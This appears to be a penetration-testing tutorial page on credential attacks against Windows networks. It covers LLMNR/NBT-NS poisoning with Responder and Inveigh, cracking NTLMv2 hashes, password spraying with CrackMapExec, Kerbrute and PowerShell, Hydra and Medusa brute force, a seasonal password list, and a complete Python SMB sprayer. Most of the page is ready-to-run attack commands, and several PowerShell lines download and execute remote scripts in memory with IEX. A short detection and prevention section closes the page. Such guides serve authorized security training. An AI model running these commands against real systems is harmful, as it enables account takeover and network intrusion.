Exploitation
Credential Attacks
Capture and crack credentials through network poisoning, password spraying, and brute force attacks against internal network services.
Warning
Only perform credential attacks within authorized scope. Captured credentials may provide access to sensitive systems.
Tool Installation
Required Tools
Kerbrute - Kerberos brute force
go install github.com/ropnop/kerbrute@latest Inveigh - PowerShell LLMNR/NBNS
IEX (iwr https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1) Hashcat/John - Password crackers
apt install hashcat john Pre-installed on Kali Linux
LLMNR/NBT-NS Poisoning
When DNS resolution fails, Windows falls back to LLMNR and NBT-NS protocols which can be poisoned to capture NTLMv2 hashes.
Protocols Poisoned: LLMNR (UDP 5355), NBT-NS (UDP 137), mDNS (UDP 5353)
Impact: Capture NTLMv2 hashes for offline cracking or relay
Detection Risk: Medium - generates network traffic anomalies
Responder - Capture Hashes
bash
# Start Responder on interface
sudo responder -I eth0 -dwPv
# Flags explained:
# -d: Enable answers for DHCP broadcast requests (DHCP poisoning)
# -w: Enable WPAD rogue proxy
# -P: Force NTLM/Basic auth on wpad.dat file retrieval
# -v: Verbose output
# Responder with WPAD proxy (aggressive)
sudo responder -I eth0 -wFPv
# Analyze mode (passive - no poisoning)
sudo responder -I eth0 -A
# Check captured hashes
ls /usr/share/responder/logs/
cat /usr/share/responder/logs/*.txt# Start Responder on interface
sudo responder -I eth0 -dwPv
# Flags explained:
# -d: Enable answers for DHCP broadcast requests (DHCP poisoning)
# -w: Enable WPAD rogue proxy
# -P: Force NTLM/Basic auth on wpad.dat file retrieval
# -v: Verbose output
# Responder with WPAD proxy (aggressive)
sudo responder -I eth0 -wFPv
# Analyze mode (passive - no poisoning)
sudo responder -I eth0 -A
# Check captured hashes
ls /usr/share/responder/logs/
cat /usr/share/responder/logs/*.txtInformation
Responder Configuration: Edit
/etc/responder/Responder.conf to enable/disable specific services. Disable SMB and HTTP when using with ntlmrelayx.
Inveigh (PowerShell Alternative)
Use Inveigh when you need to run from a compromised Windows host without uploading external tools.
powershell
# Download and import Inveigh
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1')
# Or import from disk
Import-Module .\Inveigh.ps1
# Start Inveigh with all options
Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y
# Minimal footprint (LLMNR/NBNS only)
Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y
# Check captured hashes
Get-Inveigh -NTLMv2
Get-Inveigh -Cleartext
Get-Inveigh -NTLMv2Unique # Unique hashes only
# Stop Inveigh
Stop-Inveigh
# Export captured hashes to file
Get-Inveigh -NTLMv2 | Out-File hashes.txt# Download and import Inveigh
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1')
# Or import from disk
Import-Module .\Inveigh.ps1
# Start Inveigh with all options
Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y
# Minimal footprint (LLMNR/NBNS only)
Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y
# Check captured hashes
Get-Inveigh -NTLMv2
Get-Inveigh -Cleartext
Get-Inveigh -NTLMv2Unique # Unique hashes only
# Stop Inveigh
Stop-Inveigh
# Export captured hashes to file
Get-Inveigh -NTLMv2 | Out-File hashes.txtTip
InveighZero: For C# version that can run via execute-assembly in Cobalt Strike, see InveighZero.
Crack Captured Hashes
Hashcat Mode Reference:
5600- NetNTLMv2 (most common)5500- NetNTLMv11000- NTLM (from SAM/NTDS.dit)13100- Kerberos TGS-REP (Kerberoast)18200- Kerberos AS-REP (AS-REP Roast)
bash
# Hashcat - NTLMv2 (basic)
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
# With rules (more effective)
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Multiple rule files
hashcat -m 5600 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule
# Show cracked passwords
hashcat -m 5600 hashes.txt --show
# John the Ripper
john --format=netntlmv2 hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --format=netntlmv2 hashes.txt --show # Show cracked
# Combine with custom wordlist
# Generate company-specific wordlist
echo -e 'Company2024!\nCompany123\nWelcome2Company' > company_words.txt
hashcat -m 5600 hashes.txt company_words.txt -r /usr/share/hashcat/rules/best64.rule# Hashcat - NTLMv2 (basic)
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
# With rules (more effective)
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Multiple rule files
hashcat -m 5600 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule
# Show cracked passwords
hashcat -m 5600 hashes.txt --show
# John the Ripper
john --format=netntlmv2 hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --format=netntlmv2 hashes.txt --show # Show cracked
# Combine with custom wordlist
# Generate company-specific wordlist
echo -e 'Company2024!\nCompany123\nWelcome2Company' > company_words.txt
hashcat -m 5600 hashes.txt company_words.txt -r /usr/share/hashcat/rules/best64.rulePassword Spraying
Test common passwords against many accounts while staying under lockout thresholds.
Danger
CRITICAL: Always check password policy BEFORE spraying. Account lockouts can disrupt business operations and alert defenders.
Check Password Policy First
bash
# CrackMapExec - get password policy
crackmapexec smb 192.168.1.100 -u '' -p '' --pass-pol
crackmapexec smb 192.168.1.100 -u 'guest' -p '' --pass-pol
# enum4linux-ng (updated version)
enum4linux-ng -P 192.168.1.100
# enum4linux (classic)
enum4linux -P 192.168.1.100
# rpcclient (requires null session)
rpcclient -U '' -N 192.168.1.100 -c 'getdompwinfo'
# LDAP query (with credentials)
ldapsearch -x -H ldap://192.168.1.100 -D 'user@corp.local' -w 'password' -b 'DC=corp,DC=local' '(objectClass=domain)' pwdHistoryLength minPwdAge maxPwdAge minPwdLength lockoutThreshold lockoutDuration# CrackMapExec - get password policy
crackmapexec smb 192.168.1.100 -u '' -p '' --pass-pol
crackmapexec smb 192.168.1.100 -u 'guest' -p '' --pass-pol
# enum4linux-ng (updated version)
enum4linux-ng -P 192.168.1.100
# enum4linux (classic)
enum4linux -P 192.168.1.100
# rpcclient (requires null session)
rpcclient -U '' -N 192.168.1.100 -c 'getdompwinfo'
# LDAP query (with credentials)
ldapsearch -x -H ldap://192.168.1.100 -D 'user@corp.local' -w 'password' -b 'DC=corp,DC=local' '(objectClass=domain)' pwdHistoryLength minPwdAge maxPwdAge minPwdLength lockoutThreshold lockoutDuration⚠️ Safe Spraying Strategy
- Check lockout threshold (e.g., 5 attempts)
- Check lockout duration/observation window (e.g., 30 minutes)
- Spray ONE password, wait for lockout window to reset
- Spray next password, repeat
- For 30-min lockout window: max 1 password every 35 minutes
Spray with CrackMapExec
bash
# Single password against user list
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Summer2024!' --continue-on-success
# Multiple passwords (careful with lockout!)
crackmapexec smb 192.168.1.100 -u users.txt -p passwords.txt --no-bruteforce
# Spray against specific services
crackmapexec winrm 192.168.1.100 -u users.txt -p 'Password123!'
crackmapexec ldap 192.168.1.100 -u users.txt -p 'Company2024!'# Single password against user list
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Summer2024!' --continue-on-success
# Multiple passwords (careful with lockout!)
crackmapexec smb 192.168.1.100 -u users.txt -p passwords.txt --no-bruteforce
# Spray against specific services
crackmapexec winrm 192.168.1.100 -u users.txt -p 'Password123!'
crackmapexec ldap 192.168.1.100 -u users.txt -p 'Company2024!'Kerbrute - Kerberos Spraying
Kerbrute uses Kerberos pre-authentication which is stealthier than SMB. Failed attempts appear as event ID 4771 (vs 4625 for SMB).
bash
# Download Kerbrute
wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64
chmod +x kerbrute_linux_amd64
mv kerbrute_linux_amd64 /usr/local/bin/kerbrute
# Username enumeration (no lockout risk!)
kerbrute userenum -d corp.local --dc 192.168.1.100 users.txt
# Password spray via Kerberos
kerbrute passwordspray -d corp.local --dc 192.168.1.100 users.txt 'Summer2024!'
# With delay between attempts (safer)
kerbrute passwordspray -d corp.local --dc 192.168.1.100 users.txt 'Summer2024!' --delay 100
# Brute force single user (use with caution!)
kerbrute bruteuser -d corp.local --dc 192.168.1.100 passwords.txt administrator
# Save output
kerbrute passwordspray -d corp.local --dc 192.168.1.100 users.txt 'Summer2024!' -o results.txt# Download Kerbrute
wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64
chmod +x kerbrute_linux_amd64
mv kerbrute_linux_amd64 /usr/local/bin/kerbrute
# Username enumeration (no lockout risk!)
kerbrute userenum -d corp.local --dc 192.168.1.100 users.txt
# Password spray via Kerberos
kerbrute passwordspray -d corp.local --dc 192.168.1.100 users.txt 'Summer2024!'
# With delay between attempts (safer)
kerbrute passwordspray -d corp.local --dc 192.168.1.100 users.txt 'Summer2024!' --delay 100
# Brute force single user (use with caution!)
kerbrute bruteuser -d corp.local --dc 192.168.1.100 passwords.txt administrator
# Save output
kerbrute passwordspray -d corp.local --dc 192.168.1.100 users.txt 'Summer2024!' -o results.txtTip
Username Enumeration: Kerbrute userenum doesn't cause lockouts since it only checks if usernames exist. Use this to build a valid user list before spraying.
Spray-Passwords.ps1
Part of PowerSploit/Empire - useful for spraying from a compromised Windows host.
powershell
# Download from PowerSploit
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1')
# Or use the built-in version
Import-Module .\Spray-Passwords.ps1
# Spray single password against all domain users
Invoke-DomainPasswordSpray -Password 'Summer2024!'
# Against specific user list
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 'Summer2024!'
# With delay between attempts (milliseconds)
Invoke-DomainPasswordSpray -Password 'Summer2024!' -Delay 1000
# Using password list file
Invoke-DomainPasswordSpray -PasswordList .\passwords.txt
# Output to file
Invoke-DomainPasswordSpray -Password 'Summer2024!' -OutFile spray_results.txt# Download from PowerSploit
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1')
# Or use the built-in version
Import-Module .\Spray-Passwords.ps1
# Spray single password against all domain users
Invoke-DomainPasswordSpray -Password 'Summer2024!'
# Against specific user list
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 'Summer2024!'
# With delay between attempts (milliseconds)
Invoke-DomainPasswordSpray -Password 'Summer2024!' -Delay 1000
# Using password list file
Invoke-DomainPasswordSpray -PasswordList .\passwords.txt
# Output to file
Invoke-DomainPasswordSpray -Password 'Summer2024!' -OutFile spray_results.txtService Brute Force
Hydra
bash
# SMB brute force
hydra -L users.txt -P passwords.txt smb://192.168.1.100
# RDP brute force
hydra -L users.txt -P passwords.txt rdp://192.168.1.100
# SSH brute force
hydra -L users.txt -P passwords.txt ssh://192.168.1.100
# WinRM brute force
hydra -L users.txt -P passwords.txt http-get://192.168.1.100:5985/wsman# SMB brute force
hydra -L users.txt -P passwords.txt smb://192.168.1.100
# RDP brute force
hydra -L users.txt -P passwords.txt rdp://192.168.1.100
# SSH brute force
hydra -L users.txt -P passwords.txt ssh://192.168.1.100
# WinRM brute force
hydra -L users.txt -P passwords.txt http-get://192.168.1.100:5985/wsmanMedusa
bash
# SMB brute force
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M smbnt
# Multiple hosts
medusa -H hosts.txt -U users.txt -P passwords.txt -M smbnt -T 5# SMB brute force
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M smbnt
# Multiple hosts
medusa -H hosts.txt -U users.txt -P passwords.txt -M smbnt -T 5Common Password Patterns
text
# Seasonal passwords
Summer2024!
Winter2024!
Spring2024!
Fall2024!
# Company-based
[CompanyName]2024!
[CompanyName]123
Welcome2[CompanyName]
# Common patterns
Password1!
P@ssw0rd!
Changeme1!
Qwerty123!
Admin123!# Seasonal passwords
Summer2024!
Winter2024!
Spring2024!
Fall2024!
# Company-based
[CompanyName]2024!
[CompanyName]123
Welcome2[CompanyName]
# Common patterns
Password1!
P@ssw0rd!
Changeme1!
Qwerty123!
Admin123!Python Spray Script
python
#!/usr/bin/env python3
"""Simple SMB Password Sprayer"""
from impacket.smbconnection import SMBConnection
import sys
import time
def spray(target, domain, users_file, password, delay=0):
with open(users_file) as f:
users = [line.strip() for line in f]
print(f"[*] Spraying {password} against {len(users)} users")
for user in users:
try:
conn = SMBConnection(target, target, timeout=3)
conn.login(user, password, domain)
print(f"[+] SUCCESS: {domain}\\{user}:{password}")
conn.close()
except Exception as e:
if "STATUS_LOGON_FAILURE" in str(e):
print(f"[-] Failed: {user}")
elif "STATUS_ACCOUNT_LOCKED" in str(e):
print(f"[!] LOCKED: {user}")
time.sleep(delay)
if __name__ == "__main__":
spray(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])#!/usr/bin/env python3
"""Simple SMB Password Sprayer"""
from impacket.smbconnection import SMBConnection
import sys
import time
def spray(target, domain, users_file, password, delay=0):
with open(users_file) as f:
users = [line.strip() for line in f]
print(f"[*] Spraying {password} against {len(users)} users")
for user in users:
try:
conn = SMBConnection(target, target, timeout=3)
conn.login(user, password, domain)
print(f"[+] SUCCESS: {domain}\\{user}:{password}")
conn.close()
except Exception as e:
if "STATUS_LOGON_FAILURE" in str(e):
print(f"[-] Failed: {user}")
elif "STATUS_ACCOUNT_LOCKED" in str(e):
print(f"[!] LOCKED: {user}")
time.sleep(delay)
if __name__ == "__main__":
spray(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])Tip
Always check password policy before spraying. A safe approach is one password attempt per user, then wait for the lockout window to reset before trying another password.
🔍 Detection & Prevention
Blue Team Indicators
Detection Opportunities
- • Monitor for LLMNR/NBT-NS traffic on network (ports 5353, 137)
- • Windows Event 4648 - Logon with explicit credentials
- • Windows Event 4771 - Kerberos pre-auth failures (password spray)
- • Multiple failed logins from same source IP
- • Unusual SMB traffic patterns
Prevention Measures
- • Disable LLMNR via GPO:
Computer Configuration → Policies → Administrative Templates → Network → DNS Client → Turn off multicast name resolution - • Disable NBT-NS on all interfaces
- • Enforce strong password policy (15+ characters)
- • Implement account lockout with smart thresholds
- • Deploy EDR to detect Responder/Inveigh
External Resources
Responder
LLMNR/NBT-NS/MDNS Poisoner
Inveigh
PowerShell LLMNR/NBNS/mDNS spoofer
Kerbrute
Kerberos brute force and enumeration
DomainPasswordSpray
PowerShell password spraying tool
Hashcat Wiki
Hash modes and example commands
SecLists
Password lists and usernames
🎯
Practice Labs
Practice credential attacks in safe, legal environments